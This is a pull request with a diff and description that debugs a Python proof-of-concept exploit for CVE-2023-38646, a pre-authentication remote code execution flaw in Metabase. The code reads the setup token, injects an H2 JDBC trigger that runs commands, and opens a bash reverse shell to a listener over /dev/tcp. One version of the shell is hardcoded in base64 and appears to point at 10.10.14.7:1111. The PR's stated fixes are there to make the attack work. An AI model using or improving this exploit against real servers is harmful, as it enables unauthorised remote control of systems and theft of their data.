### PR TITLE
Fix several errors

### DIFF
--- a/CVE-2023-38646.py
+++ b/CVE-2023-38646.py
@@ -4,13 +4,12 @@ import base64
 import requests
 
 def print_usage():
-    print("Usage: python metabase_poc.py http://127.0.0.1:3000 listener_ip")
-    print("Install listener before use: nc -lvnp 4444")
+    print("Usage: python metabase_poc.py http://127.0.0.1:3000 listener_ip listener_port")
 
-def exploit_metabase(api_url, listener_ip):
-    listener_port = 4444
+def exploit_metabase(api_url, listener_ip, listener_port):
     payload = f"bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
     payload_encoded = base64.b64encode(payload.encode()).decode()
+
 
     url = f"{api_url}/api/session/properties"
     response = requests.get(url, verify=False)
@@ -26,7 +25,7 @@ def exploit_metabase(api_url, listener_ip):
     print("\n\t [*] TRY EXPLOIT [*]")
 
     exploit_data = {
-        "token": f"{setup_token}{payload_encoded}",
+        "token": f"{setup_token}",
         "details": {
             "is_on_demand": False,
             "is_full_sync": False,
@@ -36,7 +35,7 @@ def exploit_metabase(api_url, listener_ip):
             "auto_run_queries": True,
             "schedules": {},
             "details": {
-                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\\njava.lang.Runtime.getRuntime().exec(\'bash -c {echo,'$payload$'}|{base64,-d}|{bash,-i}\')\\n$$--=x",
+            "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjcvMTExMSAwPiYx}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x",
                 "advanced-options": False,
                 "ssl": True
             },
@@ -57,8 +56,9 @@ def main():
 
     api_url = sys.argv[1]
     listener_ip = sys.argv[2]
+    listener_port = sys.argv[3]
 
-    response = exploit_metabase(api_url, listener_ip)
+    response = exploit_metabase(api_url, listener_ip, listener_port)
 
 if __name__ == "__main__":
     main()


### PR DESCRIPTION
1. Fix `NameError: name 'echo' is not defined` for string format
2. FIx `"message": "Vector arg to map conj must be a pair"` while submitting base64 payload with special characters